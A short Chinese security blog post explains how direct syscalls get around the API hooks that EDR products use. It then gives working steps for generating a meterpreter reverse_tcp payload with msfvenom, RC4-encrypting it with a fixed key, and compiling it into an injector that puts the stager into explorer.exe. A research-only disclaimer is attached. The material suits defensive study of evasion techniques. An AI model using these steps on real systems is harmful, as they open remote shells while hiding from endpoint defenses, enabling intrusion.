EDR解决方案使用的最常见的方法是API挂钩,可以监视正在调用的函数以及传递的参数,使用了API挂钩可以在解密的shellcode仍在内存中但尚未写入进程之前被提取,判断其是否有恶意操作。
如何避免钩子?
使用syscall,可以直接调用内核,忽略所有windows API函数,由于EDR钩子因为内核补丁保护而只能置于用户模式,使用syscall直接调用内核,完全忽略他们。
直接调用syscall需要更多精力,必须处理windows API在后台执行的所有操作,需要编写和链接自己的程序集,必须是特定版本,因为syscall编码在windows版本之间会发生变化。
https://j00ru.vexillium.org/syscalls/nt/64/
以下项目将msf stager注入到explorer.exe,还包括LdrLoadDll HOOK和syscall可以绕过userland钩子,但会触发sysmonID 8(远程连接线程创建)事件告警。代码有待完善。
https://github.com/bats3c/DefensiveInjector
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.108 LPORT=12138 -f raw -o meter.bincat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.binxxd -i encmeter.bin
生成的shellcode替换main.c文件中的代码
字符串HideMyShellzPlz?为密钥132行可修改
执行命令make编译
原作者的C2框架https://github.com/bats3c/shad0w已实现了此技术。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论